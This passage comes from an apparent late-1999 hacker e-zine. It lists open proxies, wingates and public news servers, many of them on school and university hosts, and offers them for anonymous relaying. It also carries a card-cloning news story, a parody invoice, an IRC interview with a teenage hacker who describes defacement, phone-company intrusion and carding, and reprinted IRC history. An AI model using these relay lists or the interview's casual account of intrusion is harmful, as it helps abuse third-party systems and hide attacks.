HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103,
north.ocs.k12.al.us,216.77.56.66,
adsl-98.cais.com,207.176.4.98,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
NotFound,195.146.97.178,
fsf.santa.krs.ru,195.161.57.178,
HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57,
ohs.ocs.k12.al.us,216.77.56.122,
NotFound,195.14.148.100,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
C824154A.podernet.com.mx,200.36.21.74,
NotFound,193.15.228.156,
wingate.shokoren.or.jp,210.145.221.99,
cpu1555.adsl.bellglobal.com,206.47.27.36,
NotFound,195.14.148.97,
expocom.dial-up.cz,193.85.249.31,
edtn003655.hs.telusplanet.net,161.184.150.99,
mb-kop-p2.mbusa.net,63.65.123.172,
www.sos.iqnet.cz,212.71.157.102,
jeter.ocs.k12.al.us,216.77.56.98,
modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
sai0103.erols.com,207.96.118.243,
wforest.ocs.k12.al.us,216.77.56.82,
165-246.tr.cgocable.ca,24.226.165.246,
morris.ocs.k12.al.us,216.77.56.74,
ken9029.tsukuba.accs.or.jp,210.154.99.29,
www.cassvillesd.k12.wi.us,216.56.42.3,
ns.elaso.cz,195.146.96.178,
proxy.wmisd.k12.mi.us,199.176.179.4,
Public Proxies
~~~~~~~~~~~~~~
Non transparent proxies, suggest you use http://www.lightspeed.de/irc4all/
to test these when playing with them to see what info is passed.
Location Provider URL Port Protocol
AE pd4k-2.emirates.net.ae 8080 WWW / FTP
AR proxyweb2.ssdnet.com.ar 8080 WWW / FTP
AT erde.salzburg.at 8080 WWW / FTP
AU Hutchisons T.
proxy.hutch.com.au 80 WWW / FTP
AU OzEmail netcachesyd3.ozemail.com.au 8080 WWW / FTP
BE Government lino.privacy.fgov.be 8080 WWW / FTP
BN Brunei proxy1.brunet.bn 8080 WWW / FTP
BR Telemar CAICO.telern.com.br 80 WWW / FTP
CA Csjlor www.csjlor.qc.ca 8080 WWW / FTP
CA RAPIDUS 237-67-239.tr.cgocable.ca 80 WWW / FTP
CH proxy.vtx.ch 8080 WWW / FTP
COM IWVISP proxy.iwvisp.com 8080 WWW / FTP
COM HRO gateway.hro.com 8080 WWW / FTP
COM RipNET IS CacheFlow01.RipNET.com 8080 WWW / FTP
CZ inet01.cabletel.cz 80 WWW / FTP
CO Compunet proxy.compunet.net.co 3128 WWW / FTP
DE TU Berlin andele.cs.tu-berlin.de 80 WWW / FTP
DE Uni-Kl. maccaroni.unix-ag.uni-kl.de 3128 WWW / FTP
DE ibaserver.ub.uni-dortmund.de 8080 WWW / FTP
DK www-cache.net.uni-c.dk 3128 WWW / FTP
EDU hermes.curry.edu 8080 WWW / FTP
ES Softec linux.softec.es 8080 WWW / FTP
FR cri.ens-lyon.fr 3128 WWW / FTP
FR INFONIE proxy2.infonie.fr 80 WWW / FTP
HR gita.srce.hr 80 WWW / FTP
IL Goldnet goldcache.goldnet.net.il 80 WWW / FTP
IS dyna0.islandia.is 8080 WWW / FTP
IT colnuovo.iuss.unipv.it 80 WWW / FTP
JP inet-sv.zenon.co.jp 8080 WWW / FTP
JP ns.hiu.ac.jp 80 WWW / FTP
JP Tokyo Uni kpcu.kumamoto-pct.ac.jp 8080 WWW / FTP
KR Taegu biho.taegu.ac.kr 8080 WWW / FTP
KR Kyunghee cvs2.kyunghee.ac.kr 8080 WWW / FTP
LB data450.dm.net.lb 3128 WWW / FTP
NET bright.net cacheflow.bright.net 8080 WWW / FTP
NET Stargate Ind. cacheflow.tcg.sgi.net 8080 WWW / FTP
NET BRASILNET magic.brasilnet.net 8080 WWW / FTP
NET Global One gip-rjo-1-wc01.br.global-one.net 8080 WWW / FTP
NG engine3.micro.com.ng 8080 WWW / FTP
NL GelreVision webproxy.gelrevision.nl 80 WWW / FTP
NO webcache1.globalone.no 80 WWW / FTP
PH Info mail2.info.com.ph 3128 WWW / FTP
PH electron2.msc.net.ph 3128 WWW / FTP
PT Teleweb caclis01.teleweb.pt 3128 WWW / FTP
QA Qatarnet proxy.qatar.net.qa 8080 WWW / FTP NetFilter
RO lhab-gw.soroscj.ro 80 WWW / FTP
RU adam.rosinkas.ru 80 WWW / FTP new
SE Varnamo ns.varnamo.se 8080 WWW / FTP
SG proxy1.tp.ac.sg 80 WWW / FTP new
TR Turnet ankara3.turnet.net.tr 8080 WWW
TW Golden club.golden.com.tw 8080 WWW
TW IS c1.h202052106.is.net.tw 80 WWW / FTP
UK poptel.net softy.poptel.org.uk 8080 WWW / FTP
UK proxy1.cdesd.k12.or.us 80 WWW / FTP
US K12 stpauls.pvt.k12.al.us 8080 WWW / FTP
US cache.manistee-isd.k12.mi.us 80 WWW / FTP
YE ? sah3.ye 80 WWW / FTP
ZA M-Web proxy-rnb2.mweb.co.za 80 WWW / FTP
ZA M-Web proxy.cpt.mweb.co.za 80 WWW / FTP
ZW Cybergate proxy.cybergate.co.zw 8080 WWW / FTP down/busy ?
ZW Africaonline proxy.africaonline.co.zw 8080 WWW / FTP
(C) lp
http://www.lightspeed.de/irc4all/
Telnettable Proxies
~~~~~~~~~~~~~~~~~~~
NotFound,200.36.19.225,
NotFound,200.36.19.225,
NotFound,206.103.12.131,
NotFound,210.56.18.225,
NotFound,210.56.18.226,
NotFound,210.56.18.241,
NotFound,200.248.68.129,
NotFound,210.56.18.253,
NotFound,200.248.69.50,
noeljo9.lnk.telstra.net,139.130.54.153,
modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215,
edtn004203.hs.telusplanet.net,161.184.152.139,
NotFound,195.14.148.98,
blissr.lnk.telstra.net,139.130.54.131,
PPP46-166.lvsb.vsnl.net.in,202.54.46.166,
cr216724724.cable.net.co,216.72.47.24,
cr216724718.cable.net.co,216.72.47.18,
122-94.w3.com.uy,207.3.122.94,
saward.lnk.telstra.net,139.130.55.98,
icqtwsrv1.maiowoo.com,203.135.240.3,
NotFound,212.22.69.35,
122-85.w3.com.uy,207.3.122.85,
gw.eudynelson.com,207.176.25.66,
sis-zeus.sville.edu.ph,207.0.119.67,
dns-server1.tj.pa.gov.br,200.242.244.1,
theleu.lnk.telstra.net,139.130.74.160,
210-55-191-125.ipnets.xtra.co.nz,210.55.191.125,
nor24788-1.gw.connect.com.au,202.21.13.46,
NotFound,210.161.200.82,
www.slcr.cz,212.27.210.65,
NotFound,210.56.19.5,
northeastmicro.com,204.170.187.254,
NotFound,195.5.33.222,
marina.amakusa.gr.jp,210.164.238.50,
h0040053c7824.ne.mediaone.net,24.128.48.55,
NotFound,216.72.45.152,
tconl9076.tconl.com,204.26.90.76,
NotFound,193.227.185.210,
NotFound,194.243.99.199,
NotFound,202.54.48.85,
NotFound,200.21.157.61,
server.goway.com,205.206.42.162,
web.urudata.com.uy,207.3.122.84,
cr2167248104.cable.net.co,216.72.48.104,
frontier.netline.net.au,203.28.52.160,
interate.com.pe,209.45.73.174,
210-55-191-126.ipnets.xtra.co.nz,210.55.191.126,
com3058-2.gw.connect.com.au,202.21.8.108,
PPP46-254.lvsb.vsnl.net.in,202.54.46.254,
NotFound,195.14.148.99,
ibp.santa.krs.ru,195.161.57.133,
mail.theova.com,195.14.148.65,
cr2167254143.cable.net.co,216.72.54.143,
NotFound,142.250.6.2,
plebiscito.synapsis.it,195.31.227.14,
ipshome-gw.iwahashi.co.jp,210.164.242.146,
other.issei-dc.co.jp,210.164.241.99,
x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44,
NotFound,209.177.38.98,
www.ymts.sakha.ru,194.186.182.2,
mail.ermanco.com,12.2.82.130,
mail1.bikesusa.com,207.176.25.114,
ewwmail.ozemail.com.au,203.108.128.242,
modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106,
patter.lnk.telstra.net,139.130.81.160,
server.hirup.khmelnitskiy.ua,195.230.134.227,
port58151.btl.net,206.153.58.151,
wdpcbalt.wdpc.com,208.222.211.65,
dns.gincorp.co.jp,210.164.86.34,
ts18.svamberk.cz,212.47.11.231,
mail.coolmore.com.au,203.12.145.98,
NotFound,195.14.148.101,
cr216724770.cable.net.co,216.72.47.70,
ip110.gte5.rb1.bel.nwlink.com,209.20.218.110,
ci272608-a.sptnbrg1.sc.home.com,24.4.115.144,
edsl78.mpls.uswest.net,209.181.225.79,
NotFound,210.114.231.130,
mooty.lnk.telstra.net,139.130.81.14,
NotFound,168.187.78.34,
NotFound,203.116.5.58,
c111.h202052116.is.net.tw,202.52.116.111,
cr2167251178.cable.net.co,216.72.51.178,
altona.lnk.telstra.net,139.130.80.123,
NotFound,139.130.59.187,
nevisco.city.tvnet.hu,195.38.100.242,
edtn003590.hs.telusplanet.net,161.184.150.34,
NotFound,193.15.227.125,
dns1.ctsjp.co.jp,210.172.87.146,
gaon.zg.szczecin.pl,195.116.25.98,
NotFound,195.5.33.218,
edtn003331.hs.telusplanet.net,161.184.149.29,
edtn003725.hs.telusplanet.net,161.184.150.169,
dt027n36.san.rr.com,24.30.137.54,
tsp-proxy.tsss.com,12.2.81.50,
austra53.lnk.telstra.net,139.130.56.114,
NotFound,195.161.69.65,
modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118,
cascad.lnk.telstra.net,139.130.44.197,
edtn003171.hs.telusplanet.net,161.184.148.123,
tob24399-1.gw.connect.com.au,202.21.14.234,
ad112-162.magix.com.sg,165.21.112.162,
NotFound,195.146.98.226,
NotFound,193.232.250.133,
lesy.vol.cz,212.27.211.5,
HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103,
north.ocs.k12.al.us,216.77.56.66,
adsl-98.cais.com,207.176.4.98,
modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161,
NotFound,195.146.97.178,
fsf.santa.krs.ru,195.161.57.178,
HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57,
ohs.ocs.k12.al.us,216.77.56.122,
NotFound,195.14.148.100,
carver.ocs.k12.al.us,216.77.56.114,
oms.ocs.k12.al.us,216.77.56.106,
C824154A.podernet.com.mx,200.36.21.74,
NotFound,193.15.228.156,
wingate.shokoren.or.jp,210.145.221.99,
cpu1555.adsl.bellglobal.com,206.47.27.36,
NotFound,195.14.148.97,
expocom.dial-up.cz,193.85.249.31,
edtn003655.hs.telusplanet.net,161.184.150.99,
mb-kop-p2.mbusa.net,63.65.123.172,
www.sos.iqnet.cz,212.71.157.102,
jeter.ocs.k12.al.us,216.77.56.98,
modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241,
ip48.gte5.rb1.bel.nwlink.com,209.20.218.48,
sai0103.erols.com,207.96.118.243,
wforest.ocs.k12.al.us,216.77.56.82,
165-246.tr.cgocable.ca,24.226.165.246,
morris.ocs.k12.al.us,216.77.56.74,
ken9029.tsukuba.accs.or.jp,210.154.99.29,
www.cassvillesd.k12.wi.us,216.56.42.3,
ns.elaso.cz,195.146.96.178,
proxy.wmisd.k12.mi.us,199.176.179.4,
@HWA
04.0 Cyberarmy Proxies, Accounts and Wingates etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
More goodies although somewhat less reliable, these are from the lists at
cyberarmy.com beware phishs, traps and plain bogus info mixed into the cruft.
Unfortunately this section was unavailable in time for this issue due
to server problems with cyberarmy.com. - Ed
@HWA
05.0 Belgium: Security of Banksys compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Zym0t1c an HWA correspondant
Sorry no URL provided -Ed
Belgium: Security of Banksys compromised
Unknown have succeeded into compromising the security of Banksys, the
company who controles payterminals such as Bancontact and Mister Cash. By
stealing a C-Zam payterminal at a gaz station these unknown captured a list
of credit cards and their codes. With this info they were able to create
fake credit cards. By using special equipment they copied this info on
blank plastic cards.
However, this story has two sides... Two days before the C-Zam payterminal
was stolen, three hundred people already lost ten thousend Belgian francs,
due to the use of fake credit cards. Youri Tolmatchov, spokesman of
Banksys, thinks these unknown stole the terminal for disappearing possible
evidence.
The Public Prosecutor thinks these unknown may have used binoculars or
cameras for monitoring used credit card codes. Then, creating the fake
cards is rather simple. Every good electronics store offers 'special
equipment' like card copiers. This trick was shown in a comic TV-show where
two guys were able to copy information of credit cards by using a copier and
a camera. The copies all worked perfectly. By the way, this Youri
Tolmatchov is sort of accusing the two TV-guys for their 'bad example.'
Banksys mentioned in a press conference the importance of using your secret
code very discreetly.
Incidents like these already took place in the past. One remarkable
incident was last year in France where a ghost terminal, forged by experts,
displayed 'out of use' and at the same time copied the card's info.
The next generation credit cards are more secure because they're based on
little computer chips which are very hard to copy.
A question: why has Banksys not increased their security after that
TV-incident two years ago? This is asking for troubles...
@HWA
06.0 Public access mail servers
~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: Not all newsgroups are available on all servers
Server Name Groups Posting
mailserver.corvis.ru 2405 Yes
malun1.mala.bc.ca 5383 Yes
enak.skif.net 6071 Yes
news.orconet.com 17034 Yes
valtan.sssp.mihara.hiroshima.jp 8541 Yes
news.precisionet.net 27820 Yes
24.48.24.174 21760 Yes
informer.hixnet.co.za 27127 Yes
news.bezeqint.net 32330 Yes
223.176.100.5 25887 Yes
news.cyberrealm.net 27827 Yes
news.nasionet.net 29285 Yes
system.nari-china.com 23611 Yes
news.digicon.net 26894 Yes
f400.n5020.z2.fidonet.org 2190 Yes (fido.* groups)
magpie.cat.net.th 29833 Yes
news.ku.ac.th 5315 No
hc2.hci.net 20455 Yes
news.usr.com 10463 Yes
news.netzwerk2000.de 54395 Yes
transcend.btrd.ab.ca 8052 Yes
news1.simtel.ru 17737 Yes
linux5.provincia.ps.it 4840 No
hq005is.seccom.com.my 17462 Yes
203.37.240.72 24000+ Yes
nntp.mmi.org 12277 Yes
206.97.174.98 32461 Yes
nntp1.sen.ca.gov 27608 Yes
fastnet-cache.disctronics.co.uk 22807 Yes
delphi.bc.edu 4062 No
203.41.190.130 22378 Yes
news.ochin.on.ca 20113 Yes
linux.lanetixx.de 7836 Yes
205.253.48.9 37121 Yes
207.227.203.4 45729 No
octopussy.berlin.detecon.de 2585 Yes
news.fcu.edu.tw 15156 No
208.128.255.6 27820 Yes
news.phys.uu.nl 9052 No
anode.phelpsd.com 3754 Yes
plato.devnull.tzo.net 23133 Yes
promoting.net 11406 No
news.phys.uu.nl 9212 No
news.icq.com 65 Yes (ICQ groups)
mail.advis.de 12812 Yes
24.112.33.188 31327 Yes
206.243.175.108 7554 Yes
news.digitalfoundry.com 3102 Yes
Plus many more, check out http://www.serverseekers.com/new.html for a complete
list and more details. - Ed
@HWA
07.0 Santa Claus about to lose his domain for nonpayment?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This was forwarded by another disgruntled elf (not the same one that lost his
job at Santa's workshop last year who forwarded us his credit report)...seems
Santa is feeling the crunch this year.
<snip>
Date DEC-1-, 1999
Domain Name: Santasworkshop.com
Invoice Number: 313370
Amount Due: $70.00 US Dollars
This letter s being sent as a courtesy to advise that our records show payment
for the domain name referenced above has not been received, surely a fat rich
fuck like yourself can afford a domain name?. Our records show that the following
person has been designated as the Billing Contact for the domain name in question.
Elfadmin
Admin, Elf
Santa's Workshop
POBOX H0H0H0
North Pole
Santa@santasworkshop.com
If you beleive that the payment and this notice may have crossed sleigh paths
please verify the payment status by calling (888) 771-3000 from the U.S, Canada
Peurto Rico and the U.S Virgin Islands. From other locations call (402) 496-9798
If payment is not received within 10 days from the date of this notice, domain
name service will be discontinued or one of your reindeer may be taken in leiu
of payment.
<snip>
Poor Santa... dire straits again... - Ed
@HWA
08.0 Interview with NFO (Nine Forty One Group)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NFO is a Brazilian hacking group that has been around for nearly a year
I caught up with one of the members on IRC and he agreed to a short
interview with me, so here's a peek into the mind of another hacker/cracker.
Their website is : http://www.self-evident.com/nfo/ check it out, they
also list a few recent hacks on the page...
Interview start (Slightly edited to remove personal chit chat otherwise verbatim)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Session Start: Fri Dec 24 15:33:53 1999
[15:33] <fickerguy> i'm nfo member
[15:33] <fickerguy> www.self-evident.com/nfo
<Cruciphux> you be on in a while?
<Cruciphux> under this nick?
[15:34] <fickerguy> now yes
<Cruciphux> ok ttyiab gotta finish something up
<Cruciphux> join #hwa.hax0r.news
<Cruciphux> and idle
<Cruciphux> if u want
<Cruciphux> bbiab
<Cruciphux> what does NFO stand for? just like it sounds? "info" ?
[15:40] <fickerguy> no hack group
[15:40] <fickerguy> we meet and hack
<Cruciphux> what does NFO stand for though? the group name?
<Cruciphux> can I interview you for the zine?
[15:40] <fickerguy> nfo=ninefortyone
[15:41] <fickerguy> now?
<Cruciphux> sure won't take long
[15:41] <fickerguy> ok
[15:41] <fickerguy> start
<Cruciphux> How long has NFO been around as a group and how many members do you have?
[15:42] <fickerguy> 6 months, 6 members
[15:42] <fickerguy> fickerguy, sysdenial, codak, thms, grafspee, vetesgirl
<Cruciphux> sorry was interrupted
<Cruciphux> do you deface websites or hack for access only?
<Cruciphux> I see some sites listed on your page
[15:46] <fickerguy> in the begging we were defacing a lot of brazilian government sites and some brazilians tv channels sites in brazil only cause we are brazilian except vetesgirl
<Cruciphux> ok
<Cruciphux> you are located in Brazil?
[15:46] <fickerguy> but after globo tv channels we decided to don't deface websites anymore cause in brazil only stupids are defecing sites nowadays
[15:47] <fickerguy> yes 5 of us
<Cruciphux> what is your opinion on the 'scene' today?
[15:47] <fickerguy> what do u mean? how r we on the scene?
<Cruciphux> what do you think about the other people in the scene?
<Cruciphux> general feelings
[15:48] <fickerguy> they r all assholes
[15:48] <fickerguy> as we are
<Cruciphux> good answer
<Cruciphux> ;)
[15:48] <fickerguy> heh we make groups and code to change with them and that's all :)
<Cruciphux> do you write your own exploits?
[15:48] <fickerguy> no i don't
<Cruciphux> would you call yourselves scriptkiddies then?
[15:49] <fickerguy> i do tools to use them heh
[15:49] <fickerguy> graf does
<Cruciphux> ok
[15:49] <fickerguy> graf writes exploit
[15:49] <fickerguy> as vetes and sys lots of skills and backdoors
[15:49] <fickerguy> skills/tools
<Cruciphux> what are the ages of the members in the group?
<Cruciphux> like oldest and youngest?
[15:50] <fickerguy> i dunno exactly i think thms is 18, codak 16 or 17, graf and sys older, more than 23 and vetes i forgot heh more than 30 iam 15
<Cruciphux> do you stay in contact off IRC or exclusively online?
<Cruciphux> like telephone etc
[15:51] <fickerguy> we 5 ( brazilians ) keep contact out of irc.. i mean telephone
<Cruciphux> ok do you phreak too?
[15:52] <fickerguy> no, all i do is that stuff with some wire in public phones and carding with some international phone cards
<Cruciphux> have any of your group or yourself ever been raided or afraid you might be?
[15:53] <fickerguy> i've been
[15:53] <fickerguy> i dunno about them
<Cruciphux> by who?
<Cruciphux> which agency?
[15:53] <fickerguy> i hacked main computers in telemar ( brazilian telephone company ) and they come my home
<Cruciphux> was the FBI involved? i've heard of the FBI acting outside of the US lately with Interpol in busts
[15:54] <fickerguy> other time brazilian feds got me
<Cruciphux> so Telephone Security personnel?
[15:54] <fickerguy> no
<Cruciphux> what were the consequences?
[15:54] <fickerguy> with the feds i got in court and telemar we made an agreement
<Cruciphux> cash settlement?
[15:55] <fickerguy> in the court as i was too young and a lot of talk they just asked me to don't do it anymore
[15:55] <fickerguy> and with telemar
<Cruciphux> lucky
[15:55] <fickerguy> i told them how i hacked them
[15:55] <fickerguy> and they forgive me
<Cruciphux> do you ever help out other admins after you've hacked their sites or patch holes you find?
[15:56] <fickerguy> yes i did
<Cruciphux> ok any last words you'd like to say?
[15:57] *** duro (duro@pm2-balt-98.qis.net) invites you to join #fawkerz
[15:57] <fickerguy> don't be a cow just hacking like a cow eat a lot of bullshit networks like a universtity in the end of the hell, hack cool stuff
<Cruciphux> ok anything else?
<Cruciphux> any greets?
<Cruciphux> :)
[15:58] <fickerguy> greets to my mother, father, brother, nfo members and specialy for you HEHEH
[15:58] <fickerguy> j/k
<Cruciphux> hehe
<Cruciphux> ok thanks for the interview i'll put it in issue #48
[15:59] <fickerguy> ok thank u for the enjoying time
[15:59] <fickerguy> i'll travel tonight
[15:59] <fickerguy> we talk next week
[15:59] <fickerguy> see ya
<Cruciphux> cya
Session Close: Fri Dec 24 15:59:42 1999
@HWA
09.0 The history of IRC (Internet Relay Chat)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is here coz I had a discussion on which IRC network came first and was
told Dalnet was before EFnet which I knew was wrong but it got me to thinking
not many people know the real stories of the networks they are using so here's
a couple of files on EFNet and DALNET for your edification and enlightenment - Ed
***NOTE! IF ANYONE has any info on BRC (Bitnet Relay Chat) I'd be VERY appreciative
if you could email the info or point me in the direction of information on this
predecessor to IRC mail to cruciphux@dok.org tnx!
Source: http://www.the-project.org/history.html
Early IRC history
Dates by Ian, comments by Helen (this is a very rough cut)
Send additions/corrections to frechett@colorado.edu
summer 1988 - irc2.0 released
this is Jarkko's tale of the releasing of irc:
From jto@rieska.oulu.fi Fri Dec 10 18:23:37 1993
Date: Fri, 10 Dec 93 14:46:17 +0200
From: jto@rieska.oulu.fi (Jarkko Oikarinen)
To: hrose@eff.org
Subject: IRC History...
Content-Length: 3752
Included is a history of IRC as I wrote maybe 3 or 4 years ago.
Hope it helps!
I don't know if this helps much. I hope I remember things correctly and
apologise people whom I have left out and they had deserved to be in here.
I was working in the Department of Information Processing Science in
University of Oulu during summer'88. I guess they didn't have much for me
to do. I was administring the department's sun server, but it didn't
take all time. So I started doing a communications program, which was
meant to make OuluBox (a Public Access BBS running on host tolsun.oulu.fi,
administered by me) a little more usable. The purpose was to allow
USENET News-kind of discussion and groups there in addition to real time
discussions and other BBS related stuff.
Jyrki Kuoppala (jkp@cs.hut.fi) had implemented rmsg program for sending
messages to people on other machines. It didn't have the channel concept
implemented (though it supported it), so it was mainly used for
person-to-person communications.
Another already existing simple multiuser chat program on OuluBox was
MUT (MultiUser Talk), it was written by Jukka Pihl (pihl@rieska.oulu.fi).
That program has a bad habit of not working properly, so in order to
fix this, the first implemented thing of this BBS plan was IRC.
The birthday of IRC was in August 1988. The exact date is unknown,
at the end of the month anyways.
Bitnet Relay Chat was a good inspiration for IRC. When IRC started
occasionally having more than 10 users, I asked some friends of mine to
start running irc servers in south Finland, mainly in Tampere University
of Technology and Helsinki University of Technology. Some other
universities soon followed. Markku J{rvinen (mta@cc.tut.fi) improved
the irc client (there was only one at that time) to support some emacs
editing commands. At that time it was obvious that adding BBS like
functions to the program was not a good idea, it's better to have
one program for one purpose. So the BBS extension idea was given up
and just IRC stayed.
IRC was well spread in Finland. I contacted some friends of mine through
BITNET Relay and asked if they would try this program. Internet connections
did not yet work from Finland to other countries, so they could not
connect to the Finnish network (which I suppose was the reason for them not
being very enthusiastic about irc).
Internet connections to states started working (I don't anymore remember when).
I answered to some news articles where people asked for multiuser chat
programs. I didn't get replies.
At mit, there was the legendary ai.ai.mit.edu machine running ITS.
I got an account there and learned to use it a little bit. Enough to
know how to chat with people. From there I got the first IRC user outside
Scandinavia, Mike Jacobs used IRC through OuluBox (he did not have account
on any Unix machines).
Through ai.ai.mit.edu I got to know Vijay Subramaniam (I hope I spelled
that correctly :-). I had given IRC to him and not heard of him for some
time. Then I got mail messages from Jeff Trim (used to be
jtrim@orion.cair.du.edu, University of Denver, current address unknown)
David Bleckmann (bleckmd@jacobs.cs.orst.edu) and Todd Ferguson
(melvin@jacobs.cs.orst.edu, Oregon State University).
Vijay had given IRC to them and they had started
ircd on their machines (orion.cair.du.edu and jacobcs.cs.orst.edu,
if I remember correctly) and wanted to connect to Finnish irc network.
After that some other people started running IRC, and the number
of servers grew quickly.
The first IRC server (and still running) was tolsun.oulu.fi
I have no idea of the latest one..
Aug 88 - first irc server tolsun.oulu.fi
89 - ircII released by Michael Sandrof (BigCheese)
Mar 90 - 2.2msa4
Jun 90 - 2.5beta ("+" named channels)
Jun 90 - ircII 1.90a
Jul 90 - 12 users on 38 servers
Aug 90 - IRC splits into EFnet (Eris Free) and Anet (Anarchy)
Sep 90 - 117 servers
Sep 90 - 41 users 86 servers
Nov 90 - version 2.6 released
Dec 90 - ircII 2.0beta10
late 90 - Darren Reed (Avalon) adds hash tables when IRC stops under load
xxxx 91 - Troy Rollo (Troy) takes over ircII development
Jan 91 - The Gulf war.. usage goes from peak 100 to peak 300
Jan 91 - version 2.6.1 adds flow control..
Feb 91 - bandwidth NSF stats record 8.8 Gigs for month of Feb
Mar 91 - NSF is all T1
Mar 91 - 2.6pre18 (famous for running on services.de long after 2.7 release)
Mar 91 - bandwidth 200k/2 hours
Mar 91 - 135 servers 69 us 66 non us
Apr 91 - 240 users median
Jun 91 - Cori booted off
Jul 91 - The.PLAN
Aug 91 - ircII 2.1.3
Oct 91 - 399 users 120 servers 44 opers (hits 500)
Nov 91 - ircII 2.1.5pre3
Sum 92 - ICMP attacks (cert advisory July 92)
Jan 93 - Matthew Green (phone) takes over ircII development
xxxx 94 - irc.colorado.edu hits 1000 users
late 94 - IRC hits 5,000 users
mid 95 - irc.escape.com hits 2000 users
Oct 95 - IRC hits 15,000 users
Feb 96 - Possibly largest channel ever. Id releases Qtest. #Quake sees 1556 users
May 96 - Europe and the US EFnet splits into two separate networks as a result of a disagreement on whether the network should use TS or Nick Delay as a means to prevent nick collisions.
Apr 97 - IRC hits 30,000 users
Jun 97 - irc-e.primenet.com and irc1.phoenix.net both break 3000 clients
Oct 97 - "smurf.c" - multi-broadcast ICMP attack posted to Bugtraq
Denial of Service attacks on EFnet servers hit an all-time high
Jan 98 - IRC hits 40,000 users
Mar 98 - irc.blackened.com breaks 4000 clients
Apr 98 - irc.blackened.com breaks 5000 clients
May 98 - irc.blackened.com breaks 6000 clients
Jun 98 - irc.blackened.com breaks 7000 clients
Sep 98 - irc.blackened.com breaks 8000 clients
Feb 99 - irc.idle.net breaks 9000 clients
Feb 99 - irc.idle.net breaks 10000 clients
Feb 99 - IRC hits 50,000 users
Jul 99 - irc.freei.net breaks 11000 clients
Aug 99 - irc.concentric.net breaks 12000 clients
Aug 99 - irc.concentric.net breaks 13000 clients
Nov 99 - EFnet breaks 60,000 clients
Nov 99 - irc.core.com breaks 14000 clients
Dec 99 - irc.core.com breaks 15000 clients
Dec 99 - irc.core.com breaks 16000 clients
Need dates for
- IRC gets 10 servers
see my note above from Jarkko
- IRC gets 100 servers
the very first time it was done was May 1990, but it soon dropped down
again. It was before the split and anyone could set up a server so we set
up a few on machines at UC to bring the total up to 100 :-)
[before EFnet/Anet]
- IRC gets 200 servers (it has been over 200.. but has dropped since)
- irc2.4 (numeric only channels)
here's a bit of history...
I first started using irc in January or February of 1990. At the time the
latest server revs were 2.2PL0 and 2.2PL1. msa and Chelsea Ashley Dyerman
were working on the 2.3 release ... there was a disagreement between them
about the copyrights. Chelsea had everything copyrighted by the IRCDC (IRC
Development Consortium). People told her they didn't like that, it should
be GPL'ed. She released 2.3alpha with those copyrights. Very few sites ran
it as it didn't offer much over 2.2PL1.
At the same time, msa was doing his own work. He added very handy things
like /whowas, nick chase kill, wallops (later removed), and remote /away
propogation. He had several releases, the most stable being 2.2msa4 and
2.2msa9. 2.2msa10 eventually turned into 2.4 (2.3 was "tainted" by
Chelsea).
Jarkko came along and did a bit of cleanup on 2.4 (which was stable in and
of itself) and released 2.4.1.
- irc2.5
Armin did 2.5 alpha, and then Jarkko took it over, with his idiotic 2.5+
release. msa (I believe) did 2.5.1 ... then Tom Hopkins and some other BU
folks (myself included) collaborated on 2.5.1.bu.10, possibly the most
stable server version to date :-) No new features went into 2.5.1.bu.10
(also called 2.5.2 in the docs, but it was never released as such), just
bug fixes. I wish we did that nowadays :-)
- irc2.6 + channels (still have numerics) # channels added later on
Armin started the 2.6 release and then Avalon took it over.
- irc2.7 # channels replace + channels and numerics go away forever
2.7 was a nice cleanup release. People tried to do things a bit more by
the book. ircd was put through a saber C check (and bullied into
compliance :-)
Bans were added to the server in 2.7. In 2.6 you could kick a user out but
had to rekick or go +i to stop them from rejoining.
- irc2.8 & channels..
- irc2.9 + channels are back, sorta
Read the operlist archives on ftp.kei.com:/pub/irc/mailing-lists
USBIC, planned in 1993, never passed. Again, more archives on
ftp.kei.com:/pub/irc
Again, I really suggest you look at the operlist and irclist archives on
ftp.kei.com:/pub/irc/mailing-lists -- it covers most of these issues.
- WALLOPS removed
Again, the dates should be in the archives
- MODES added
modes were added with + channels.
-=-
Source: http://www.dalnet.com/
DALNET History file
The History of IRC
September 1999
Contents
1. Some information on IRC
2. Some information on DALnet
3. Looking to the future
1. Some Info on IRC
IRC or Internet Relay Chat was originally written by Jarkko Oikarinen in
the year 1988. Since it's birth in Finland, IRC is in use in over sixty
countries worldwide. IRC was originally designed as a replacement for a
program called "Talk". "What is IRC?" you may ask. IRC is a
multi-user chat system that connects 'servers' around the world by means
of a 'cable' of sorts. These servers form a gigantic web that allows you
to connect to a given server. You can then join 'chat rooms' or 'channels'
that don't really exist. They are virtual meeting halls of sorts. This
allows anyone with an internet connection to participate in live chat. IRC
is a constantly evolving machine. New changes are made to the IRCd
(Internet Relay Chat Daemon or server program) that make your IRC
experience all the more enjoyable. DALnet coders have recently created a
new IRCd, Bahamut, which enables servers to run faster and more
efficiently. You can get more information at http://www.bahamut.net.
During IRC's relativly short history it has quickly shown it's superiority
over other chat systems like those owned by America On Line. This is
because of several reasons. Firstly, IRC is free. There is no charge to
use IRC or DALnet and there are no prerequisets to join.
Internet Relay Chat was propelled into the spotlight during the gulf war
